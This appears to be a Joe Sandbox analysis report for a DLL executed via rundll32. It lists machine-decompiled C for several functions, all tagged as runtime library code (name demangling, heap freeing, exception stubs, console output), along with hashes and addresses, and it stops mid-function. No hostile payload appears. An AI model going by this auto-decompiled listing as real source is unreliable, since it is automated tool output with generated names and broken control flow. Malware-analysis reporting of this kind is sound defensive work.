C, xrefs: 10025DBD

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 9dc0fb1ca5f463f5db6b5af44ed4f027f2feaede1bd810cdfab43a669e4722c1
Instruction ID: f4aafdac77f09b8263a2eb5dd3b4e6a66393a76b9c0d6fd7f3033f3f19c4753f
Opcode Fuzzy Hash: 9dc0fb1ca5f463f5db6b5af44ed4f027f2feaede1bd810cdfab43a669e4722c1
Instruction Fuzzy Hash: 43B17D7590121A9FDB64DF18D988AADB3F4FF08345F9145AAE80AA7350D731AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10008AEA, Relevance: 10.7, APIs: 7, Instructions: 151
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10008AEA(void* __ebx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v36;
				char _v44;
				char* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;
				intOrPtr* _t68;
				intOrPtr* _t69;
				char* _t73;
				void* _t77;
				void* _t78;
				intOrPtr* _t83;
				char* _t88;
				intOrPtr* _t104;
				void* _t108;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t123;

				_t50 =  *0x1004e004; // 0x0
				_t119 = _t118 - 0x28;
				if( *_t50 == 0) {
					_t51 = _a8;
					_t115 = 0;
					if( *_a8 == 0) {
						goto L16;
					} else {
						_v28 = ")[";
						_v24 = 2;
						_t54 = E1000770C(E10007684(E10007637(_t85,  &_v44, 0x28, _t51),  &_v36,  &_v28),  &_v20, 1);
						_t88 =  &_v12;
						goto L17;
					}
					L21:
				} else {
					_t113 = E1000AAAD();
					_t123 = _t113;
					if(_t123 < 0 || _t123 == 0) {
						_t115 = 0;
						L16:
						_v12 = _t115;
						_v8 = _t115;
						E10008798( &_v12, 0x5b);
						_t54 = E1000770C( &_v12,  &_v44, 1);
						_t88 =  &_v36;
						L17:
						E10008D42(_a4, E100076C8(_t54, _t88, 0x5d));
						_t57 = _a4;
					} else {
						_t83 = _a8;
						_v12 = 0;
						_v8 = 0;
						if(( *(_t83 + 4) & 0x00000800) == 0) {
							L5:
							_t62 = _t113;
							_t113 = _t113 - 1;
							if(_t62 != 0) {
								_t73 =  *0x1004e004; // 0x0
								if( *_t73 != 0) {
									_t77 = E10007637(_t85,  &_v36, 0x5b, E10009E08(_t108,  &_v20, 0));
									_t119 = _t119 + 0x14;
									_t78 = E100076C8(_t77,  &_v44, 0x5d);
									_t85 =  &_v12;
									E100077A0( &_v12, _t78);
									goto L8;
								}
							}
						} else {
							_v20 = 0x10042dd4;
							_t85 =  &_v12;
							_v16 = 2;
							E10007748( &_v12,  &_v20);
							L8:
							if(_v8 <= 1) {
								goto L5;
							}
						}
						if( *_t83 != 0) {
							if(( *(_t83 + 4) & 0x00000800) == 0) {
								_t68 = E100076C8(E10007637(_t85,  &_v44, 0x28, _t83),  &_v36, 0x29);
								_push( &_v12);
								_push( &_v20);
								_t104 = _t68;
							} else {
								_t104 = _t83;
								_push( &_v12);
								_push( &_v44);
							}
							_t69 = E100076A6(_t104);
							_v12 =  *_t69;
							_v8 =  *((intOrPtr*)(_t69 + 4));
						}
						E1000B1EA(_t83,  &_v28,  &_v12);
						_t57 = _a4;
						 *_t57 = _v28;
						 *(_t57 + 4) = _v24 | 0x00000800;
					}
				}
				return _t57;
				goto L21;
			}

0x10008aed
0x10008af2
0x10008afa
0x10008c40
0x10008c43
0x10008c47
0x00000000
0x10008c49
0x10008c4d
0x10008c57
0x10008c7d
0x10008c82
0x00000000
0x10008c82
0x00000000
0x10008b00
0x10008b05
0x10008b07
0x10008b09
0x10008c01
0x10008c03
0x10008c08
0x10008c0b
0x10008c0e
0x10008c1c
0x10008c21
0x10008c24
0x10008c32
0x10008c37
0x10008b15
0x10008b16
0x10008b1b
0x10008b1e
0x10008b28
0x10008b46
0x10008b46
0x10008b48
0x10008b4b
0x10008b4d
0x10008b55
0x10008b68
0x10008b6d
0x10008b78
0x10008b7e
0x10008b81
0x00000000
0x10008b81
0x10008b55
0x10008b2a
0x10008b2d
0x10008b35
0x10008b38
0x10008b3f
0x10008b86
0x10008b8a
0x00000000
0x00000000
0x10008b8a
0x10008b8e
0x10008b97
0x10008bbc
0x10008bc4
0x10008bc8
0x10008bc9
0x10008b99
0x10008b9c
0x10008b9e
0x10008ba2
0x10008ba2
0x10008bcb
0x10008bd2
0x10008bd8
0x10008bd8
0x10008be3
0x10008be8
0x10008bf9
0x10008bfb
0x10008bfe
0x10008b09
0x10008c3f
0x00000000

APIs

DName::operator+.LIBCMT ref: 10008B78
DName::operator+.LIBCMT ref: 10008BCB

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

Part of subcall function 10007637: DName::operator+.LIBCMT ref: 10007658

DName::operator+.LIBCMT ref: 10008BBC
DName::operator+.LIBCMT ref: 10008C1C
DName::operator+.LIBCMT ref: 10008C29
DName::operator+.LIBCMT ref: 10008C70
DName::operator+.LIBCMT ref: 10008C7D

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: c8cb4e4b3be6c4ee29983329df1be7be1792c1402584c21628f1be7317d469b5
Instruction ID: 0dbcc1bb4ee46c20ec2d03185912c156ee3fc1c0119f9f9dc31a411e659c0aa6
Opcode Fuzzy Hash: c8cb4e4b3be6c4ee29983329df1be7be1792c1402584c21628f1be7317d469b5
Instruction Fuzzy Hash: 775186B5D04218AFEB05CB94C895EEEBBF8FF08390F044159F546A7185DB75AB44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10009E08, Relevance: 10.6, APIs: 7, Instructions: 102
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 42%

			E10009E08(void* __edx, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				void* __ebx;
				intOrPtr _t24;
				char* _t27;
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t30;
				intOrPtr _t33;
				char _t38;
				intOrPtr* _t40;
				char _t42;
				char* _t45;
				char* _t46;
				void* _t55;
				intOrPtr* _t56;

				_t55 = __edx;
				_t40 =  *0x1004e004; // 0x0
				_t38 = 0;
				if( *_t40 == 0x51) {
					_t38 = 1;
					_t40 = _t40 + 1;
					 *0x1004e004 = _t40;
				}
				_t24 =  *_t40;
				if(_t24 != 0) {
					if(_t24 < 0x30 || _t24 > 0x39) {
						E1000CBF0(_t40,  &_v44);
						if(_v36 == 0) {
							_t27 =  *0x1004e004; // 0x0
							if( *_t27 != 0) {
								_t42 = 0;
								_v8 = 2;
								_v12 = 0;
								_t56 =  &_v12;
							} else {
								_t29 = E100072DE( &_v36, 1);
								goto L22;
							}
						} else {
							_push(_v40);
							 *0x1004e004 =  *0x1004e004 + 1;
							_push(_v44);
							if(_a8 == 0) {
								if(_t38 == 0) {
									_t45 =  &_v20;
									goto L11;
								} else {
									_t46 =  &_v36;
									goto L8;
								}
							} else {
								if(_t38 == 0) {
									_t29 = E10007328(_t38,  &_v20);
									goto L22;
								} else {
									_t30 = E10007328(_t38,  &_v36);
									goto L9;
								}
							}
							goto L23;
						}
					} else {
						_t33 = _t24;
						if(_t38 == 0) {
							asm("cdq");
							asm("adc edx, 0xffffffff");
							_push(_t55);
							 *0x1004e004 = _t40 + 1;
							_t45 =  &_v36;
							_push(_t33 + 0xffffffd1);
							L11:
							_t29 = E100073B4(_t45);
							L22:
							_t56 = _t29;
						} else {
							asm("cdq");
							_push(_t55);
							 *0x1004e004 = _t40 + 1;
							_t46 =  &_v20;
							_push(_t33 - 0x2f);
							L8:
							_t30 = E100073B4(_t46);
							L9:
							E100076A6(E1000723E( &_v28, 0x1004d070),  &_v12, _t30);
							_t56 =  &_v12;
						}
						L23:
						_t42 =  *_t56;
					}
					_t28 = _a4;
					 *_t28 = _t42;
					_t22 = _t56 + 4; // 0x40001004
					 *((intOrPtr*)(_t28 + 4)) =  *_t22;
				} else {
					E100072DE(_a4, 1);
					_t28 = _a4;
				}
				return _t28;
			}

0x10009e08
0x10009e0b
0x10009e15
0x10009e1a
0x10009e1c
0x10009e1e
0x10009e1f
0x10009e1f
0x10009e25
0x10009e29
0x10009e40
0x10009ea0
0x10009eaa
0x10009ee7
0x10009eef
0x10009f01
0x10009f03
0x10009f0a
0x10009f0d
0x10009ef1
0x10009ef6
0x00000000
0x10009ef6
0x10009eac
0x10009eac
0x10009eaf
0x10009eb9
0x10009ebc
0x10009ed8
0x10009ee2
0x00000000
0x10009eda
0x10009eda
0x00000000
0x10009eda
0x10009ebe
0x10009ec0
0x10009ecf
0x00000000
0x10009ec2
0x10009ec5
0x00000000
0x10009ec5
0x10009ec0
0x00000000
0x10009ebc
0x10009e46
0x10009e46
0x10009e4b
0x10009e82
0x10009e86
0x10009e8a
0x10009e8b
0x10009e91
0x10009e94
0x10009e95
0x10009e95
0x10009efb
0x10009efb
0x10009e4d
0x10009e51
0x10009e52
0x10009e53
0x10009e59
0x10009e5c
0x10009e5d
0x10009e5d
0x10009e62
0x10009e78
0x10009e7d
0x10009e7d
0x10009efd
0x10009efd
0x10009efd
0x10009f10
0x10009f14
0x10009f16
0x10009f19
0x10009e2b
0x10009e30
0x10009e35
0x10009e35
0x10009f1e

APIs

DName::DName.LIBVCRUNTIME ref: 10009E30
DName::DName.LIBVCRUNTIME ref: 10009E5D

Part of subcall function 100073B4: __aulldvrm.LIBCMT ref: 100073E5

DName::operator+.LIBCMT ref: 10009E78
DName::DName.LIBVCRUNTIME ref: 10009E95
DName::DName.LIBVCRUNTIME ref: 10009EC5
DName::DName.LIBVCRUNTIME ref: 10009ECF
DName::DName.LIBVCRUNTIME ref: 10009EF6

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: c2653dc1151c0b8f23c99d4576837361905e921933427748eb52f378f376a92a
Instruction ID: 0ead771c213622766d894edfd69fa415a0cbe9b7da6d14d4204ba7d65ba76e3a
Opcode Fuzzy Hash: c2653dc1151c0b8f23c99d4576837361905e921933427748eb52f378f376a92a
Instruction Fuzzy Hash: E731F471D042849AFF08CFA4CD91BED7BB5FF09380F104059E959A729ADB746D85CB14

Uniqueness

Uniqueness Score: -1.00%

Function 1000A460, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E1000A460(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				long _v76;
				char _v80;
				long long _v84;
				char _v92;
				char _v96;
				void* _v100;
				void* __ebp;
				signed int _t24;
				intOrPtr _t26;
				char* _t29;
				intOrPtr* _t30;
				intOrPtr* _t44;
				void* _t45;
				long long _t46;
				intOrPtr* _t55;
				signed int _t56;
				long long* _t57;
				long long _t61;

				_t54 = __edx;
				_t24 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t24 ^ _t56;
				_t44 =  *0x1004e004; // 0x0
				_t55 = _a4;
				_t26 =  *_t44;
				if(_t26 != 0) {
					if(_t26 < 0x30 || _t26 > 0x39) {
						E1000CBF0(_t44,  &_v100);
						_pop(_t45);
						if(_v92 == 0) {
							L11:
							_t29 =  *0x1004e004; // 0x0
							if( *_t29 != 0) {
								_t46 = 0;
								_v80 = 2;
								_v84 = 0;
								_t30 =  &_v84;
							} else {
								_t30 = E100072DE( &_v84, 1);
								_t46 =  *_t30;
							}
							 *_t55 = _t46;
							 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t30 + 4));
						} else {
							_v84 = _v100;
							_v80 = _v96;
							if(_a8 != 0x42) {
								if(_a8 != 0x41) {
									goto L11;
								} else {
									_t61 = _v84;
									goto L8;
								}
							} else {
								_t61 = _v84;
								L8:
								 *_t57 = _t61;
								swprintf( &_v76, 0x41, "%lf", _t45, _t45);
								_v80 = 0;
								_push(_v80);
								E10006DC1(_t55,  &_v76);
							}
						}
					} else {
						asm("cdq");
						 *0x1004e004 = _t44 + 1;
						E100073B4(_t55, _t26 - 0x2f, __edx);
					}
				} else {
					E100072DE(_t55, 1);
				}
				return E100037EA(_t55, _v8 ^ _t56, _t54);
			}

0x1000a460
0x1000a466
0x1000a46d
0x1000a470
0x1000a477
0x1000a47a
0x1000a47e
0x1000a490
0x1000a4b6
0x1000a4bf
0x1000a4c0
0x1000a50e
0x1000a50e
0x1000a516
0x1000a526
0x1000a528
0x1000a52f
0x1000a532
0x1000a518
0x1000a51d
0x1000a522
0x1000a522
0x1000a535
0x1000a53a
0x1000a4c2
0x1000a4c9
0x1000a4cf
0x1000a4d2
0x1000a507
0x00000000
0x1000a509
0x1000a509
0x00000000
0x1000a509
0x1000a4d4
0x1000a4d4
0x1000a4d7
0x1000a4d9
0x1000a4e7
0x1000a4ef
0x1000a4f8
0x1000a4fc
0x1000a4fc
0x1000a4d2
0x1000a496
0x1000a49d
0x1000a49f
0x1000a4a8
0x1000a4a8
0x1000a480
0x1000a484
0x1000a484
0x1000a54b

APIs

DName::DName.LIBVCRUNTIME ref: 1000A484
DName::DName.LIBVCRUNTIME ref: 1000A4A8

Strings

%lf, xrefs: 1000A4DC
A, xrefs: 1000A503

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::
String ID: %lf$A
API String ID: 1333004437-43661536
Opcode ID: 09a75fdd47e4acb5447cdab9d691237d5dc8450d4975c5c861bb3ef48e028a29
Instruction ID: 1a9286bd75de71b3adf91c9212a77dd4288feb1749d5defe6a7f402daddab9a2
Opcode Fuzzy Hash: 09a75fdd47e4acb5447cdab9d691237d5dc8450d4975c5c861bb3ef48e028a29
Instruction Fuzzy Hash: 7E31CEB5E042589BEF24CFA4DD45ADDBBB4FF0A380F10415EE8459B249C7B4A981CB05

Uniqueness

Uniqueness Score: -1.00%

Function 1002F7C8, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002F7C8(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E1002F497(_t45, 7);
					E1002F497(_t45 + 0x1c, 7);
					E1002F497(_t45 + 0x38, 0xc);
					E1002F497(_t45 + 0x68, 0xc);
					E1002F497(_t45 + 0x98, 2);
					E100268B3( *((intOrPtr*)(_t45 + 0xa0)));
					E100268B3( *((intOrPtr*)(_t45 + 0xa4)));
					E100268B3( *((intOrPtr*)(_t45 + 0xa8)));
					E1002F497(_t45 + 0xb4, 7);
					E1002F497(_t45 + 0xd0, 7);
					E1002F497(_t45 + 0xec, 0xc);
					E1002F497(_t45 + 0x11c, 0xc);
					E1002F497(_t45 + 0x14c, 2);
					E100268B3( *((intOrPtr*)(_t45 + 0x154)));
					E100268B3( *((intOrPtr*)(_t45 + 0x158)));
					E100268B3( *((intOrPtr*)(_t45 + 0x15c)));
					return E100268B3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x1002f7ce
0x1002f7d3
0x1002f7dc
0x1002f7e7
0x1002f7f2
0x1002f7fd
0x1002f80b
0x1002f816
0x1002f821
0x1002f82c
0x1002f83a
0x1002f848
0x1002f859
0x1002f867
0x1002f875
0x1002f880
0x1002f88b
0x1002f896
0x00000000
0x1002f8a6
0x1002f8ab

APIs

Part of subcall function 1002F497: _free.LIBCMT ref: 1002F4BC

_free.LIBCMT ref: 1002F816

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002F821
_free.LIBCMT ref: 1002F82C
_free.LIBCMT ref: 1002F880
_free.LIBCMT ref: 1002F88B
_free.LIBCMT ref: 1002F896
_free.LIBCMT ref: 1002F8A1

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b6a4d705080cccdd2f01c69a37c813b959a5eb3b3a4044ec5a65d09ed6793608
Instruction ID: de5a865e1f82c24ee5e8fa7fff2b21cb884519308ee5bc5c1053497f94fa0323
Opcode Fuzzy Hash: b6a4d705080cccdd2f01c69a37c813b959a5eb3b3a4044ec5a65d09ed6793608
Instruction Fuzzy Hash: F511DA75640B08AAE620EBF0ED47FEB7B9CEF04740F804D3DB699A6152DBA9B5048750

Uniqueness

Uniqueness Score: -1.00%

Function 1000337C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E1000337C(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v52;
				char _v72;
				intOrPtr _v80;
				char _v104;
				intOrPtr _v112;
				char _v132;
				void* _t43;
				void* _t44;
				void* _t45;

				_t44 = _t43 - 0xc;
				E10002F08( &_v16, _a4);
				E10004C0B( &_v16, 0x1004ad80);
				asm("int3");
				_push(_t43);
				_t45 = _t44 - 0xc;
				E10002F7C( &_v44, _v24);
				E10004C0B( &_v44, 0x1004adbc);
				asm("int3");
				_push(_t44);
				E10002FB6( &_v72, _v52);
				E10004C0B( &_v72, 0x1004adf8);
				asm("int3");
				_push(_t45);
				E10002FF9( &_v104, _v80);
				E10004C0B( &_v104, 0x1004ae88);
				asm("int3");
				_push(_t45 - 0xc);
				E10003042( &_v132, _v112);
				E10004C0B( &_v132, 0x1004ae34);
				asm("int3");
				return "bad function call";
			}

0x1000337f
0x10003388
0x10003396
0x1000339b
0x1000339c
0x1000339f
0x100033a8
0x100033b6
0x100033bb
0x100033bc
0x100033c8
0x100033d6
0x100033db
0x100033dc
0x100033e8
0x100033f6
0x100033fb
0x100033fc
0x10003408
0x10003416
0x1000341b
0x10003421

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003388

Part of subcall function 10002F08: std::exception::exception.LIBCONCRT ref: 10002F15

Part of subcall function 10004C0B: RaiseException.KERNEL32(E06D7363,00000001,00000003,10003CFA,?,?,?,10003CFA,?,1004AC7C), ref: 10004C6B

std::invalid_argument::invalid_argument.LIBCONCRT ref: 100033A8

Part of subcall function 10002F7C: std::exception::exception.LIBCONCRT ref: 10002F89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 100033C8

Part of subcall function 10002FB6: std::exception::exception.LIBCONCRT ref: 10002FC3

std::regex_error::regex_error.LIBCPMT ref: 100033E8

Part of subcall function 10002FF9: std::exception::exception.LIBCONCRT ref: 10003011

std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003408

Part of subcall function 10003042: std::exception::exception.LIBCONCRT ref: 1000304F

Strings

bad function call, xrefs: 1000341C

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: std::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID: bad function call
API String ID: 2470674941-3612616537
Opcode ID: 346c17465034ca6be7bf942654ed0d14118ffd4f0e314fec286e0fdce0ccf1d8
Instruction ID: 9a04ec3b8265f418b22985a109fb5f94b6ecf92577c3c0eff2a7a32c9cb980e7
Opcode Fuzzy Hash: 346c17465034ca6be7bf942654ed0d14118ffd4f0e314fec286e0fdce0ccf1d8
Instruction Fuzzy Hash: 3E11B77DC0410CBBEB04EAE4DC46CDD777DEF04180F904474BA2592456FB74BA5986D9

Uniqueness

Uniqueness Score: -1.00%

Function 1003265D, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E1003265D(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebp;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t241;
				signed int _t243;
				intOrPtr _t246;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				void* _t260;
				intOrPtr _t261;
				signed int _t262;
				signed char _t265;
				intOrPtr _t268;
				signed char* _t270;
				signed int _t273;
				signed int _t274;
				signed int _t278;
				signed int _t279;
				intOrPtr _t280;
				signed int _t281;
				struct _OVERLAPPED* _t283;
				struct _OVERLAPPED* _t285;
				signed int _t286;
				void* _t287;
				void* _t288;

				_t170 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t170 ^ _t286;
				_t172 = _a8;
				_t265 = _t172 >> 6;
				_t243 = (_t172 & 0x0000003f) * 0x38;
				_t270 = _a12;
				_v108 = _t270;
				_v80 = _t265;
				_v112 =  *((intOrPtr*)(_t243 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x18));
				_v44 = _t243;
				_v96 = _a16 + _t270;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E1000F794( &_v72, _t265, 0);
				_t274 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t246 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t246;
				_v104 = _t270;
				if(_t270 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t249 = _v44;
						_v51 =  *_t270;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x1004e628 + _v80 * 4));
						_v48 = _t186;
						if(_t246 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t268 = _v48 + 0x2e + _t249;
						_v116 = _t268;
						while( *((intOrPtr*)(_t268 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t265 = _v96 - _t270;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t270 & 0x000000ff) + 0x1004d7f0; // 0x0
							_t254 =  *_t72 + 1;
							_v48 = _t254;
							__eflags = _t254 - _t265;
							if(_t254 > _t265) {
								__eflags = _t265;
								if(_t265 <= 0) {
									goto L40;
								} else {
									_t279 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x1004e628 + _v80 * 4)) + _t279 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t270));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t265;
									} while (_t241 < _t265);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t254 - 4;
								_v140 = _t241;
								_v56 = _t270;
								_v40 = (_t254 == 4) + 1;
								_t220 = E1003356D( &_v144,  &_v76,  &_v56, (_t254 == 4) + 1,  &_v144);
								_t288 = _t287 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t280 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t249 + _v48 + 0x2e) & 0x000000ff) + 0x1004d7f0)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t265) {
								__eflags = _t265;
								if(_t265 > 0) {
									_t281 = _t249;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t270));
										_t260 =  *((intOrPtr*)(0x1004e628 + _v80 * 4)) + _t281 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t260 + _v40 + 0x2e)) = _t227;
										_t281 = _v44;
										__eflags = _t241 - _t265;
									} while (_t241 < _t265);
									L39:
									_t274 = _v88;
								}
								L40:
								_t278 = _t274 + _t265;
								__eflags = _t278;
								L41:
								__eflags = _v60;
								_v88 = _t278;
							} else {
								_t265 = _v40;
								_t283 = _t241;
								_t261 = _v116;
								do {
									 *((char*)(_t286 + _t283 - 0xc)) =  *((intOrPtr*)(_t261 + _t283));
									_t283 =  &(_t283->Internal);
								} while (_t283 < _t265);
								_t284 = _v48;
								_t262 = _v44;
								if(_v48 > 0) {
									E100045C0( &_v16 + _t265, _t270, _t284);
									_t262 = _v44;
									_t287 = _t287 + 0xc;
									_t265 = _v40;
								}
								_t273 = _v80;
								_t285 = _t241;
								do {
									 *( *((intOrPtr*)(0x1004e628 + _t273 * 4)) + _t262 + _t285 + 0x2e) = _t241;
									_t285 =  &(_t285->Internal);
								} while (_t285 < _t265);
								_t270 = _v104;
								_t280 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E1003356D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t288 = _t287 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t270 = _t270 - 1 + _t280;
									L27:
									_t270 =  &(_t270[1]);
									_v104 = _t270;
									_t193 = E10028BDD(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t287 = _t288 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t274 = _v84 - _v108 + _t270;
											_v88 = _t274;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t270 >= _v96) {
														goto L48;
													} else {
														_t246 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t274 = _t274 + 1;
															_v88 = _t274;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t265 =  *((intOrPtr*)(_t249 + _t186 + 0x2d));
						__eflags = _t265 & 0x00000004;
